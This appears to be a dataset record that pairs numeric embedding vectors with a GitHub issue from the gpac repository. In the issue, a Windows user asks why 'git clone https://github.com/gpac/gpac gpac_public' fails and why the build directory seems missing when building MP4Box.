-0.018692944198846817, 0.0016720001585781574, -0.012168597429990768, 0.0011855836492031813, 0.011528527364134789, -0.012350435368716717, 0.015056184493005276, 0.002542095026001334, -0.02224242128431797, -0.00317125441506505, -0.011208493262529373, -0.004509581718593836, -0.007826306857168674, -0.008997343480587006, -0.03261445835232735, 0.006433427799493074, 0.009891985915601254, 0.01982761360704899, -0.004200457129627466, -0.012503179721534252, 0.03360365703701973, -0.014008797705173492, 0.0053642201237380505, 0.014256097376346588, -0.009135539643466473, 0.019551219418644905, 0.0001567216095281765, 0.011484886519610882, 0.005204203072935343, -0.0000952376431087032, -0.0190857145935297, -0.0042295511811971664, -0.017296427860856056, -0.016205400228500366, -0.023202525451779366, -0.0105538759380579, -0.013826959766447544, 0.031217943876981735, -0.027901219204068184, -0.029792334884405136, -0.013586933724582195, 0.005327852908521891, 0.009775609709322453, 0.021355051547288895, -0.04983815178275108, 0.005422408692538738, -0.02212604507803917, -0.009375565685331821, 0.020947735756635666, 0.007124411873519421, 0.009055531583726406, -0.000009752482583280653, -0.017325522378087044, -0.0004284557362552732, -0.0025439132004976273, -0.033778224140405655, -0.014568858779966831, 0.006768009625375271, -0.004142269026488066, 0.013332360424101353, 0.02589372731745243, -0.012430444359779358, -0.01387060061097145, 0.012539546936750412, -0.00703712971881032, -0.030956096947193146, 0.006287957075983286, 0.008553658612072468, -0.00740444241091609, 0.005611519794911146, 0.006593444850295782, -0.008153614588081837, 0.01750008761882782, -0.0012546820798888803, 0.0028694032225757837, 0.012481358833611012, -0.0053533101454377174, -0.007204420864582062, 0.003433101112022996, -0.004011345561593771, -0.01723824068903923, 0.006604355294257402, 0.027377525344491005, 0.0009355563670396805, -0.000011002618521160912, -0.011593989096581936, 0.01629268191754818, -0.009586498141288757, 0.030665157362818718, 0.008328179828822613, 0.028163066133856773, -0.007869947701692581, -0.01087391097098589, -0.03255627304315567, 0.0008214530535042286, -0.009346472099423409, 0.009084625169634819, 0.014968901872634888, -0.037647735327482224, -0.003654943313449621, -0.013310539536178112, 0.0063425088301301, -0.015347125008702278, 0.017078222706913948, 0.0009664688259363174, 0.007826306857168674, 0.01678728125989437, 0.019056620076298714, 0.023304354399442673, 0.016569076105952263, 0.004033166449517012, -0.012234059162437916, 0.00742262601852417, 0.010946646332740784, -0.00562606705352664, -0.004665962420403957, 0.004324106965214014, -0.0013946972321718931, 0.008335452526807785, 0.004047713242471218, 0.005135104525834322, -0.014387020841240883, -0.0008505471632815897, -0.003611302236095071, 0.020147647708654404, 0.0056224302388727665, -0.006604355294257402, -0.019522124901413918, 0.0005596063565462828, -0.008379094302654266, 0.006513436324894428, -0.0015919915167614818, 0.008037238381803036, 0.006451611407101154, -0.020874999463558197, -0.013085060752928257, -0.007520818617194891, -0.0020293118432164192, -0.007964503020048141, 0.01475069671869278, -0.015594424679875374, -0.02160235121846199, 0.01454703789204359, -0.013623300939798355, 0.018009232357144356, -0.010604790411889553, -0.022271515801548958, 0.009419207461178303, 0.010182926431298256, 0.005807904992252588, -0.01712186448276043, -0.0010864819632843137, 0.012692290358245373, 0.010866637341678143, -0.008313632570207119, -0.004422299563884735, -0.0074080792255699635, -0.008248170837759972, 0.01847473904490471, 0.006018836982548237, 0.016889112070202827, 0.0024329922161996365, -0.012997779063880444, 0.012750479392707348, 0.02107865922152996, 0.004284102935343981, 0.02186419814825058, -0.005349673330783844, -0.013295993208885193, -0.004898715298622847, 0.022824302315711975, -0.0022711562924087048, -0.0017720110481604934, 0.0018056511180475354, 0.006677090656012297, 0.004738697782158852, 0.016685452312231064, 0.019696690142154694, -0.013739677146077156, 0.0000550344011571724, -0.0002875312929973006, 0.001771101844497025, -0.003389459801837802, -0.01089573185890913, -0.019973084330558777, 0.013521471992135048, 0.00840818788856268, -0.0019965809769928455, 0.0012628647964447737, 0.002362075261771679, 0.017718292772769928, 0.007164416369050741, 0.012219511903822422, -0.005327852908521891, -0.011390331201255322, -0.014343379996716976, 0.0006291593890637159, -0.001015565125271678, -0.0011237587314099073, 0.013616027310490608, 0.010379311628639698, 0.014125173911452293, -0.011834015138447285, -0.007284429389983416, 0.02528275176882744, 0.0034858339931815863, 0.029443204402923584, -0.0018874781671911478, -0.0008596390252932906, 0.001330144819803536, 0.0065970816649496555, -0.0030403309501707554, -0.025573693215847015, 0.007498998194932938, -0.012197691947221756, 0.013346907682716846, 0.0077753919176757336, 0.004709603730589151, -0.00672800512984395, 0.012226785533130169, -0.0014237914001569152, -0.006851654965430498, 0.014379747211933136, 0.01776193454861641, 0.009870165027678013, -0.0005405133706517518, 0.011004834435880184, 0.01588536612689495, -0.0014410659205168486, 0.007629921659827232, -0.0006227950798347592, -0.007993597537279129, 0.010088371112942696, 0.002653016010299325, 0.00568425515666604, 0.01572534814476967, 0.00565516110509634, 0.005906097590923309, -0.019071167334914207, 0.012859581969678402, -0.01716550439596176, -0.01584172435104847, -0.007258972153067589, -0.018809320405125618, -0.0029403201770037413, -0.0059424652718007565, -0.011492160148918629, 0.0205113235861063, -0.0004509581776801497, 0.008837325498461723, 0.014008797705173492, 0.01269956398755312, -0.0028003049083054066, 0.011593989096581936, -0.0004700511635746807, -0.004655052442103624, 0.004982360638678074, -0.006087935529649258, -0.007549912668764591, -0.007564459927380085, 0.005706075578927994, -0.014801611192524433, 0.00003202053267159499, 0.02374076656997204, 0.009361019358038902, 0.009411933831870556, -0.008379094302654266, 0.015899913385510445, -0.008400914259254932, 0.008830051869153976, -0.007378985174000263, -0.007600827608257532, 0.005862456280738115, -0.0012383166467770934, 0.0009573769639246166, 0.004000435583293438, 0.0269120205193758, -0.0190857145935297, -0.01847473904490471, 0.022489720955491066, 0.01136851031333208, -0.003389459801837802, 0.0034130988642573357, -0.009848345071077347, 0.01413244754076004, 0.02084590494632721, 0.004440483637154102, -0.006957121193408966, -0.015550783835351467, -0.008422735147178173, 0.007204420864582062, -0.014496123418211937, -0.009230095893144608, -0.002582099288702011, -0.02928318828344345, -0.0032312609255313873, -0.009208275005221367, -0.0106702521443367, 0.006473431829363108, -0.011943118646740913, -0.0017129137413576245, -0.0188529621809721, 0.0018474739044904709, -0.002452994231134653, 0.025864634662866592, -0.0004786884819623083, -0.02107865922152996, -0.00012501361197791994, -0.01010291837155819, 0.023304354399442673, -0.0010637522209435701, -0.006633449345827103, 0.017470993101596832, 0.01982761360704899, 0.014954355545341969, 0.0035603875294327736, -0.001938392873853445, -0.015172560699284077, -0.0018820230616256595, 0.0035603875294327736, -0.0029712326359003782, -0.001094664679840207, -0.017020035535097122, -0.013936062343418598, 0.011819468811154366, -0.016190852969884872, 0.00670982152223587, -0.009404660202562809, -0.01409608032554388, 0.003225805703550577, -0.003556750947609544, -0.015739895403385162, 0.000216955435462296, -0.023493466898798943, -0.00914281327277422, 0.008335452526807785, -0.006837108172476292, -0.010168380104005337, 0.0032385343220084906, -0.01387060061097145, 0.008670034818351269, -0.023129791021347046, 0.024177176877856255, -0.00700803566724062, -0.013565112836658955, 0.007182599976658821, 0.012859581969678402, 0.019434843212366104, 0.0036585801281034946, 0.008931881748139858, 0.004084080923348665, -0.015318031422793865, 0.0027893944643437862, -0.01413244754076004, -0.007535365875810385, -0.014045164920389652, -0.027202961966395378, 0.000018041737348539755, 0.027188414707779884, -0.009601045399904251, -0.008590025827288628, 0.0034840155858546495, 0.014408841729164124, -0.01802377961575985, -0.0024111715611070395, 0.007477177772670984, 0.005313305649906397, -0.027144772931933403, 0.015754442662000656, -0.018867509439587593, -0.012917770072817802, -0.0030312391463667154, 0.014256097376346588, 0.014379747211933136, 0.016379965469241142, -0.00354220368899405, 0.003342181909829378, -0.0006859837449155748, 0.013463283888995647, 0.007313523441553116, 0.026766549795866013, -0.022227874025702477, 0.006466158665716648, 0.011164851486682892, 0.0063134147785604, 0.01780557446181774, 0.024642683565616608, -0.008793684653937817, -0.0061570340767502785, 0.02288249135017395, 0.017296427860856056, -0.0005809723515994847, -0.006858928594738245, 0.013223257847130299, -0.023289809003472328, 0.014263371005654335, 0.0077317506074905396, 0.01648179441690445, -0.006142486818134785, -0.012735932134091854, 0.010452046990394592, 0.01083754375576973, 0.0002450266620144248, 0.01572534814476967, 0.0003627667610999197, 0.000463686854345724, -0.03104337863624096, 0.0041131749749183655, -0.0013201436959207058, 0.0015956282150000334, -0.02337709069252014, -0.02864311821758747, 0.003642214694991708, -0.0008600936271250248, -0.003967704717069864, -0.0365130640566349, 0.031101567670702934, 0.004793249070644379, 0.0012201328063383698, 0.008364547044038773, -0.006753462366759777, 0.008590025827288628, 0.010306576266884804, 0.012946863658726215, -0.030577873811125755, -0.01591446064412594, -0.024642683565616608, -0.0020947735756635666, 0.023187978193163872, 0.02190783992409706, 0.00526966480538249, 0.004778702277690172, -0.0018747495487332344, -0.01136851031333208, -0.0195657666772604, -0.02058405987918377, 0.004345927853137255, 0.006884385831654072, 2.628127049320028e-7, 0.008502744138240814, 0.01693275198340416, -0.026213763281702995, -0.00703712971881032, 0.023755313828587532, 0.010044730268418789, -0.0010501142824068666, -0.007004398852586746, 0.00004616980004357174, 0.028206707909703255, 0.008182709105312824, 0.005135104525834322, 0.003333090106025338, 0.004305923357605934, 0.03229442611336708, 0.013761498034000397, -0.0008382730884477496, -0.008211802691221237, -0.008946428075432777, -0.0022256968077272177, 0.003804050385951996, -0.002276611514389515, -0.013026872649788857, 0.02494817040860653, 0.017020035535097122, -0.0020529506728053093, -0.003920426592230797, -0.014874346554279327, 0.01716550439596176, 0.008480923250317574, 0.018431097269058228, -0.01851837895810604, -0.007659015711396933, -0.00816816184669733, -0.005116920452564955, -0.009666507132351398, 0.003111247904598713, 0.011717638932168484, 0.018387455493211746, -0.029181359335780144, 0.011033928021788597, 0.0012137684971094131, 0.016438152641057968, -0.02442447654902935, -0.027377525344491005, 0.009535583667457104, -0.012299520894885063, -0.009244643151760101, -0.0038731489330530167, -0.003931337036192417, -0.01245953794568777, -0.019100261852145195, 0.010146559216082096, 0.004033166449517012, -0.018503831699490547, -0.0009991996921598911, 0.012430444359779358, 0.023115243762731552, 0.00772447744384408, 0.007819033227860928, -0.00882277823984623, 0.004509581718593836, 0.0017529181204736233, -0.0033785495907068253, -0.007608100771903992, -0.022969773039221764, -0.008000871166586876, 0.023464372381567955, 0.01621994748711586, 0.013070513494312763, -0.010532055981457233, 0.009266463108360767, -0.003978615161031485, -0.005487869959324598, 0.005735169630497694, 0.018241986632347107, -0.003909516613930464, 0.0009041893645189703, 0.005604246631264687, -0.012968684546649456, -0.02446811832487583, -0.014874346554279327, -0.013506924733519554, 0.006204311735928059, 0.012794120237231255, -0.023013414815068245, 0.03662944212555885, 0.02314433827996254, -0.011761280708014965, 0.02043858915567398, -0.0018292900640517473, -0.004789612255990505, 0.008422735147178173, 0.001692911610007286, -0.007637194823473692, 0.003974978346377611, 0.01309960801154375, -0.010641158558428288, -0.038782402873039246, 0.022591549903154373, -0.00843000877648592, 0.022635191679000854, 0.006007927004247904, 0.007964503020048141, -0.013805138878524303, -0.008022691123187542, -0.009593771770596504, 0.018722038716077805, 0.00993562676012516, 0.010342944413423538, 0.0020729529205709696, -0.01057569682598114, 0.015870818868279457, 0.03357456251978874, -0.0035203832667320967, -0.0076662893407046795, -0.0011573986848816276, -0.004258645232766867, 0.012110409326851368, -0.033399999141693115, 0.011826742440462112, 0.02698475494980812, 0.01471432950347662, 0.002398442942649126, -0.013994250446557999, 0.011179398745298386, 0.008422735147178173, -0.00024616316659376025, -0.0013901513302698731, 0.0032458079513162374, 0.008240897208452225, -0.00890278723090887, -0.0044877612963318825, -0.005156924948096275, -0.0012674106983467937, -0.005400587804615498, 0.0014310649130493402, -0.004004072397947311, -0.0053533101454377174, -0.002531184582039714, -0.008953701704740524, -0.005091463215649128, 0.0015347125008702278, -0.03564024344086647, 0.01987125352025032, -0.013215984217822552, 0.0052369339391589165, 0.007826306857168674, -0.020351305603981018, -0.03729860484600067, -0.01365966908633709, -0.023958971723914146, -0.007949956692755222, -0.014408841729164124, 0.0034912892151623964, -0.009797430597245693, -0.012270426377654076, -0.0044259363785386086, -0.015827177092432976, -0.01010291837155819, 0.008757317438721657, 0.014525217935442924, 0.010590244084596634, -0.004054986871778965, -0.0026875652838498354, -0.031625259667634964, 0.007637194823473692, 0.011790374293923378, 0.013252351433038712, -0.00452412897720933, -0.02257700264453888, 0.027828484773635864, -0.018009232357144356, 0.018343815580010414, 0.0183729100972414, 0.002038403647020459, 0.023915329948067665, 0.027232054620981216, -0.019274825230240822, -0.01731097511947155, -0.013085060752928257, 0.00496781338006258, 0.010168380104005337, 0.013332360424101353, 0.0031003374606370926, 0.003785866778343916, -0.017936497926712036, 0.008008144795894623, -0.01292504370212555, 0.005226023495197296, 0.015987195074558258, 0.006557077635079622, 0.02046768181025982, -0.0025257295928895473, -0.0077317506074905396, 0.011077569797635078, 0.0077390242367982864, 0.004865984432399273, 0.007455356884747744, 0.0002591191150713712, 0.0013074150774627924, 0.00636069243773818, 0.015230748802423477, -0.03078153356909752, -0.0026784734800457954, -0.01918754354119301, -0.015943553298711777, 0.016758188605308533, 0.007637194823473692, -0.00801541842520237, 0.020409494638442993, 0.008284538052976131, -0.021180488169193268, 0.0019038436003029346, 0.016627265140414238, 0.0029712326359003782, -0.00808815285563469, -0.009302831254899502, 0.01576898992061615, -0.003094882471486926, 0.0034458297304809093, 0.004007709212601185, -0.02649015747010708, 0.006524346768856049, -0.021515069529414177, -0.016510888934135437, 0.0046586887910962105, -0.007069860585033894, -0.0014737967867404222, -0.0195657666772604, -0.04093536362051964, -0.0028657664079219103, 0.00024343559925910085, 0.017252787947654724, 0.01025566179305315, -0.001697457511909306, -0.0005400587688200176, -0.006826197728514671, -0.011812195181846619, 0.009251915849745274, -0.0034094620496034622, 0.019813066348433495, 0.004698693286627531, -0.013310539536178112, 0.014997996389865875, -0.0035440220963209867, -0.0051751090213656425, 0.052514806389808655, 0.004295012913644314, -0.008968248963356018, 0.013412369415163994, -0.004953266587108374, 0.003633122891187668, -0.002536639804020524, -0.01539076678454876, -0.0009141904301941395, 0.013746950775384903, -0.004964176565408707, 0.004280466120690107, 0.025035452097654343, -0.0211077518761158, -0.005822452250868082, -0.013063239865005016, -0.01023384090512991, 0.00916463416069746, -0.017732840031385422, -0.01745644584298134, -0.011855836026370525, -0.005106010474264622, 0.014968901872634888, -0.01712186448276043, -0.019798519089818, 0.013623300939798355, 0.009011889807879925, -0.019245730713009834, 0.013157796114683151, -0.023013414815068245, 0.011506707407534122, -0.00638978648930788, -0.0062115853652358055, -0.006753462366759777, 0.00698985205963254, 0.00869185570627451, 0.006975304801017046, 0.0002196830027969554, 0.004091354552656412, -0.027115678414702415, -0.0070262192748487, 0.028133971616625786, -0.004356837831437588, 0.002069316105917096, 0.011048475280404091, -0.002245699055492878, -0.016889112070202827, -0.007877221331000328, 0.0030257839243859053, -0.004320470150560141, -0.009673780761659145, 0.012634102255105972, 0.013892421498894691, 0.01764555647969246, 0.01780557446181774, -0.0024020797573029995, 0.00096555968048051, -0.005884277168661356, 0.005756990518420935, -0.01790740340948105, -0.007469904143363237, -0.024962717667222023, -0.00459322752431035, 0.007240788079798222, -0.004895078483968973, -0.011208493262529373, 0.01899843104183674, 0.028061237186193466, -0.024075347930192947, 0.008619120344519615, 0.008939155377447605, -0.022213326767086983, -0.0011255770223215222, 0.009535583667457104, -0.015318031422793865, -0.021515069529414177, -0.0038440548814833164, 0.003920426592230797, 0.0004014073347207159, -0.017325522378087044, -0.016845470294356346, -0.007437173277139664, 0.0035912999883294106, -0.001332872430793941, -0.00037867759237997234, -0.009659233503043652, -0.022489720955491066, -0.006247953046113253, 0.005324216093868017, 0.03179982677102089, 0.011972212232649326, 0.021238675341010094, -0.01166672445833683, -0.01814015582203865, -0.01588536612689495, -0.015201655216515064, 0.007877221331000328, -0.006738915573805571, 0.0009564677602611482, -0.009404660202562809, -0.009033710695803165, 0.013092334382236004, -0.002198421163484454, 0.008299085311591625, 0.012146776542067528, -0.011739459820091724, 0.004927809350192547, 0.007906314916908741, -0.00421500438824296, -0.012866855598986149, 0.018052874132990837, -0.011012108065187931, -0.015318031422793865, 0.00490962527692318, 0.01844564452767372, -0.015899913385510445, 0.01439429447054863, 0.011841288767755032, -0.003742225468158722, -0.00318034621886909, -0.006797103676944971, -0.00455322302877903, 0.03139250725507736, -0.006422517355531454, 0.013543292880058289, 0.0030548779759556055, 0.006517073139548302, 0.01224860642105341, -0.00593519164249301, 0.001137396553531289, 0.0035767529625445604, -0.025937369093298912, 0.010510235093533993, 0.008982796221971512, 0.009004616178572178, -0.008059059269726276, -0.026926567777991295, -0.005360583774745464, 0.02006036601960659, -0.005200566258281469, -0.02212604507803917, 0.03843327611684799, -0.009913806803524494, -0.00035913000465370715, 0.001963850110769272, 0.004676872864365578, -0.016772735863924026, -0.016903657466173172, -0.0031021558679640293, -0.012234059162437916, 0.015798082575201988, 0.005924281198531389, 0.011877656914293766, -0.009848345071077347, 0.0029930530581623316, 0.0007959957583807409, 0.018111063167452812, 0.01972578465938568, -0.0032385343220084906, -0.004829616751521826, -0.003956794273108244, -0.002882131841033697, 0.000042192092223558575, -0.005189655814319849, -0.006269773468375206, 0.029210451990365982, -0.0009437390835955739, -0.02491907589137554, 0.012488632462918758, 0.023202525451779366, 0.0015938099240884185, 0.004429573193192482, -0.004836890380829573, 0.00028480374021455646, -0.0071862367913126945, 0.017543727532029152, 0.0006237042834982276, -0.01443066168576479, 0.01607447676360607, 0.0065861716866493225, 0.025500958785414696, 0.004429573193192482, -0.03209076449275017, 0.0051932926289737225, 0.015536236576735973, 0.006226132158190012, 0.000056739132560323924, -0.032119859009981155, 0.0005355128669179976, 0.0015347125008702278, 0.003456739941611886, -0.013186889700591564, 0.025384580716490746, -0.014343379996716976, -0.0042731924913823605, 0.02987961657345295, 0.0125686414539814, 0.017150957137346268, 0.016699999570846558, -0.005207839887589216, 0.006840744521468878, -0.021005922928452492, -0.016990941017866135, 0.015085279010236263 ]
1,728
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I'm building MP4Box Only on Windows and having some trouble with the git clone. As a git noob I was unable to use the command `git clone https://github.com/gpac/gpac gpac_public` as recommended as it failed in Visual Studio 2019 and at the command line. I suspect this is to do with the space before gpac_public, but not sure how to deal with it. What does it mean? I was able to clone with the url [https://github.com/gpac/gpac.git](url), but the build directory was not cloned with it. What am I doing wrong? Sorry for the noob question I was able to build the solution very effectively by downloading the master branch, but this is not ideal from a maintenance perspective Thanks
Unable to clone gpac_public
https://api.github.com/repos/gpac/gpac/issues/1860/comments
2
2021-07-18T09:26:40
2021-07-18T23:12:03Z
https://github.com/gpac/gpac/issues/1860
946,992,509
1,860
false
This is a GitHub Issue repo:gpac owner:gpac Title : Unable to clone gpac_public Issue date: --- start body --- I'm building MP4Box Only on Windows and having some trouble with the git clone. As a git noob I was unable to use the command `git clone https://github.com/gpac/gpac gpac_public` as recommended as it failed in Visual Studio 2019 and at the command line. I suspect this is to do with the space before gpac_public, but not sure how to deal with it. What does it mean? I was able to clone with the url [https://github.com/gpac/gpac.git](url), but the build directory was not cloned with it. What am I doing wrong? Sorry for the noob question I was able to build the solution very effectively by downloading the master branch, but this is not ideal from a maintenance perspective Thanks --- end body ---
826
[ -0.007636686787009239, 0.04184678941965103, -0.012166566215455532, -0.001607120968401432, 0.009665622375905514, -0.02516443282365799, -0.004515789914876223, 0.06238975748419762, -0.020500699058175087, -0.010475787334144115, 0.022585993632674217, -0.02585483342409134, 0.020021645352244377, -0.035027313977479935, -0.021444717422127724, 0.03925425931811333, -0.006963897496461868, 0.008045291528105736, -0.02078249678015709, -0.01911989599466324, 0.04562286287546158, -0.01525928359478712, -0.03178665041923523, -0.0005710783298127353, -0.012363824062049389, 0.003719714470207691, -0.019627129659056664, 0.03344925120472908, -0.01666826568543911, -0.013589639216661453, 0.015146564692258835, 0.007791674695909023, 0.02724972739815712, 0.026376157999038696, 0.05771193653345108, 0.00754510285332799, -0.0008031202014535666, 0.028672799468040466, -0.028024667873978615, -0.018034979701042175, -0.0215856172144413, -0.03429464250802994, -0.011504344642162323, -0.012701979838311672, -0.014850678853690624, 0.00022290548076853156, -0.0026330365799367428, 0.01997937634587288, -0.007686001248657703, -0.017443206161260605, 0.007006166968494654, 0.0028197267092764378, -0.01827450655400753, -0.02847554162144661, -0.018457675352692604, -0.010743494145572186, 0.012462452985346317, -0.019415782764554024, -0.020810676738619804, 0.02003573440015316, -0.0009968553204089403, 0.013716447167098522, -0.0035858612973243, 0.020218903198838234, 0.015949685126543045, 0.06182616576552391, 0.011095739901065826, 0.03350561112165451, 0.015780607238411903, 0.010356023907661438, 0.03621085733175278, -0.010419427417218685, 0.022966420277953148, 0.014540702104568481, 0.030631285160779953, -0.07755041122436523, 0.02992679364979267, -0.02981407567858696, -0.032772939652204514, 0.026531146839261055, -0.048384469002485275, -0.010053092613816261, -0.03981785476207733, -0.019415782764554024, -0.021148832514882088, 0.008594795130193233, -0.022853700444102287, -0.049934349954128265, -0.042015865445137024, -0.007714180741459131, 0.014752049930393696, 0.04931439831852913, 0.018612662330269814, -0.030152231454849243, 0.03931061923503876, 0.021656066179275513, 0.002881369786337018, 0.0013667133171111345, -0.027291996404528618, -0.04210040718317032, 0.008876591920852661, -0.004325577057898045, -0.018612662330269814, -0.020867034792900085, -0.0021997743751853704, -0.012392004020512104, 0.07056185603141785, -0.011842500418424606, 0.02751743420958519, 0.08363721519708633, 0.0002509750484023243, 0.003962764050811529, 0.027700601145625114, -0.002587244613096118, 0.0038183433935046196, 0.02720745839178562, -0.013617818243801594, -0.022740982472896576, 0.000016511517969775014, 0.016118763014674187, 0.023924527689814568, 0.00879205297678709, -0.05204782262444496, -0.03018041141331196, -0.02987043559551239, 0.013984153978526592, -0.01602013409137726, -0.005593661684542894, -0.02623526006937027, 0.002597812097519636, -0.04119865596294403, 0.003297019749879837, 0.0012214119778946042, 0.0033445728477090597, -0.014110962860286236, -0.014681600965559483, 0.003534785471856594, 0.012377914041280746, -0.018570393323898315, 0.012349734082818031, -0.06836384534835815, -0.03925425931811333, 0.028560081496834755, 0.006752550136297941, 0.012793563306331635, -0.008968175388872623, -0.01327966246753931, -0.0004174111527390778, -0.030546747148036957, 0.009116118773818016, -0.014329355210065842, -0.005572527181357145, 0.014554792083799839, 0.022571904584765434, 0.0641932561993599, -0.0028373391833156347, 0.0026277529541403055, -0.022078759968280792, -0.010905526578426361, -0.022431006655097008, 0.0004526357224676758, -0.01461115200072527, 0.028447363525629044, 0.015231103636324406, -0.0066363089717924595, 0.0014899993548169732, 0.01490703783929348, 0.015935596078634262, -0.016231480985879898, 0.005709902849048376, -0.0036844899877905846, 0.030659465119242668, 0.006312242709100246, 0.04458021745085716, -0.020613418892025948, -0.030011333525180817, 0.014153231866657734, 0.041536811739206314, 0.004480565432459116, -0.02120519056916237, -0.01290628220885992, 0.03387194499373436, 0.0005578691489063203, -0.014752049930393696, 0.032406605780124664, 0.011919994838535786, 0.010461697354912758, 0.004332622047513723, 0.025037623941898346, -0.03666173294186592, 0.0192326158285141, -0.020317532122135162, 0.037422582507133484, -0.0018422449938952923, 0.04257946088910103, 0.02195195108652115, -0.017386848106980324, 0.006139642558991909, 0.01535791251808405, 0.0030451640486717224, 0.010518056340515614, 0.013427605852484703, -0.0029482964891940355, 0.0205711480230093, -0.022261928766965866, 0.020232992246747017, -0.027010200545191765, 0.05647202953696251, 0.011236637830734253, -0.033364713191986084, -0.023952707648277283, -0.010743494145572186, -0.011905904859304428, -0.02447403036057949, 0.004660210572183132, -0.003022268181666732, -0.01571015827357769, -0.020345712080597878, -0.038437049835920334, 0.0029236392583698034, -0.028940506279468536, -0.010947796516120434, 0.03798617795109749, 0.0024798098020255566, -0.06656035035848618, 0.0035224570892751217, -0.01816178858280182, -0.004709525033831596, -0.04708820581436157, 0.00014365020615514368, -0.0006917224964126945, 0.004420683719217777, 0.014336399734020233, 0.016316020861268044, 0.010046047158539295, -0.011990443803369999, -0.007678956259042025, 0.00559718394652009, -0.04305851459503174, 0.01098302099853754, 0.004297397565096617, 0.05576753988862038, -0.027221547439694405, -0.02757379412651062, 0.021994221955537796, 0.016654176637530327, -0.007122408133000135, -0.005389359313994646, -0.013117630034685135, -0.027320176362991333, 0.003624608274549246, 0.011765005998313427, 0.0023829422425478697, 0.0024304953403770924, 0.007974842563271523, 0.019007178023457527, -0.0009422572329640388, -0.020472519099712372, 0.04086050018668175, -0.01666826568543911, -0.006977987475693226, 0.010665999725461006, -0.03220934793353081, 0.0036950574722141027, 0.0398460328578949, -0.03463279828429222, -0.027926038950681686, 0.006104418076574802, 0.04452385753393173, 0.0006221539806574583, 0.010694179683923721, -0.026460696011781693, -0.02975771576166153, -0.010884392075240612, -0.011736826971173286, 0.0036281307693570852, 0.037591662257909775, -0.004878602921962738, 0.009214747697114944, -0.00870751403272152, 0.03787345811724663, 0.013047181069850922, -0.021177010610699654, 0.014110962860286236, -0.014780229888856411, -0.00817914493381977, -0.010116496123373508, -0.010299663990736008, -0.015386092476546764, 0.07050549983978271, -0.0019250226905569434, 0.017231859266757965, -0.00590363796800375, 0.04339667037129402, -0.007932573556900024, 0.00017656316049396992, -0.0035876224283128977, 0.015047936700284481, 0.003740849206224084, 0.02051478996872902, -0.02939138188958168, 0.027855589985847473, -0.002937729237601161, -0.0161892119795084, -0.011039379984140396, 0.01842949539422989, -0.005540824960917234, 0.015935596078634262, -0.02586892433464527, -0.0020465475972741842, 0.06176980584859848, -0.019303064793348312, -0.041762251406908035, 0.0012566365767270327, -0.01997937634587288, 0.021627886220812798, 0.04334031045436859, -0.011455030180513859, -0.0586700439453125, -0.004054347984492779, -0.0031420316081494093, -0.008228459395468235, -0.044326599687337875, -0.03088490292429924, 0.03364650905132294, 0.008608885109424591, -0.05077974125742912, 0.0034167831763625145, -0.03511185199022293, -0.01517474465072155, 0.021994221955537796, 0.0035858612973243, 0.03990239277482033, -0.05734559893608093, 0.02650296688079834, -0.03623903915286064, 0.0069885547272861, -0.005512645002454519, 0.06374238431453705, -0.023487742990255356, -0.009475409053266048, 0.005209713708609343, 0.0058296662755310535, -0.030039513483643532, 0.009031579829752445, -0.01938760280609131, 0.011053469963371754, -0.007594417314976454, 0.019204435870051384, -0.005396404303610325, 0.0008955847006291151, 0.02987043559551239, -0.022571904584765434, -0.03590088337659836, 0.005713425111025572, -0.006174867041409016, 0.0010567371500656009, -0.05979723110795021, 0.03823979198932648, 0.0077634952031075954, 0.019739849492907524, -0.0667857825756073, -0.006731415167450905, 0.017781361937522888, 0.006534157786518335, 0.024023156613111496, -0.02768651209771633, -0.015188834629952908, -0.006875835824757814, -0.020078005269169807, -0.005734560079872608, 0.012525857426226139, -0.03922608122229576, 0.008411627262830734, -0.0252771507948637, -0.0019038879545405507, 0.00023798599431756884, 0.013991199433803558, -0.01354736927896738, -0.004603851120918989, -0.007974842563271523, 0.023375025019049644, 0.013716447167098522, -0.0299831535667181, 0.01071531418710947, -0.005343567114323378, -0.03387194499373436, 0.047426361590623856, -0.03209662809967995, -0.0303494893014431, -0.028602350503206253, 0.01810542866587639, -0.0013526234542950988, -0.0074676088988780975, -0.039451517164707184, 0.016640087589621544, -0.028884146362543106, -0.027531523257493973, -0.01913398690521717, -0.005931817460805178, 0.01656963676214218, -0.015625618398189545, -0.015836967155337334, 0.005706380121409893, 0.0014882381074130535, -0.0030821498949080706, 0.007925528101623058, 0.004660210572183132, -0.0002452510816510767, 0.029560459777712822, -0.014892947860062122, 0.014780229888856411, 0.017231859266757965, 0.025558948516845703, 0.047370001673698425, -0.006019879132509232, -0.0049455296248197556, 0.03189937025308609, -0.021768784150481224, 0.036041781306266785, -0.011828410439193249, -0.003899359842762351, 0.007298531010746956, 0.006456663832068443, 0.020486610010266304, 0.029842255637049675, -0.0021927293855696917, 0.03046220727264881, 0.021444717422127724, -0.023417294025421143, 0.006886403542011976, -0.02617890015244484, 0.002574915997684002, 0.015569259412586689, -0.036520835012197495, -0.013695312663912773, -0.019049447029829025, -0.03668991103768349, 0.00381482089869678, 0.0015578066231682897, -0.03421010076999664, 0.03621085733175278, 0.0033199156168848276, -0.030011333525180817, -0.003369230078533292, -0.017485477030277252, -0.0594027154147625, 0.022628264501690865, 0.03685899078845978, -0.02453039027750492, 0.0055619594641029835, 0.015935596078634262, -0.00865115411579609, 0.012709024362266064, -0.028884146362543106, 0.002393509494140744, -0.012384958565235138, 0.019796207547187805, -0.03536546975374222, 0.00041829177644103765, 0.010151720605790615, -0.021627886220812798, 0.026686133816838264, 0.03815525397658348, 0.044692933559417725, 0.01461115200072527, 0.02468537911772728, -0.028447363525629044, 0.00426217308267951, -0.01408278290182352, 0.006932195276021957, 0.027827410027384758, 0.03260386362671852, 0.02500944398343563, -0.021036112681031227, 0.01800679974257946, -0.0022719847038388252, -0.028517812490463257, 0.007559192832559347, -0.03761984035372734, -0.035506367683410645, -0.02105020359158516, 0.0040473029948771, 0.009531768970191479, -0.02981407567858696, -0.018880369141697884, -0.018978998064994812, -0.01752774603664875, 0.007622596807777882, 0.019148075953125954, 0.027376536279916763, 0.04193132743239403, -0.020542969927191734, -0.027277907356619835, 0.014822498895227909, -0.022247837856411934, -0.013850300572812557, 0.015555170364677906, 0.03823979198932648, -0.00865115411579609, 0.035450007766485214, 0.006741982884705067, -0.009531768970191479, -0.000627877947408706, 0.058106452226638794, -0.016978243365883827, -0.012561081908643246, 0.023896347731351852, -0.01934533379971981, 0.01151843462139368, -0.01735866814851761, 0.008573660627007484, -0.026038002222776413, -0.042551279067993164, -0.017781361937522888, 0.007714180741459131, -0.019796207547187805, 0.024009067565202713, 0.03370286896824837, 0.024459941312670708, -0.02569984644651413, -0.014174367301166058, -0.010391248390078545, 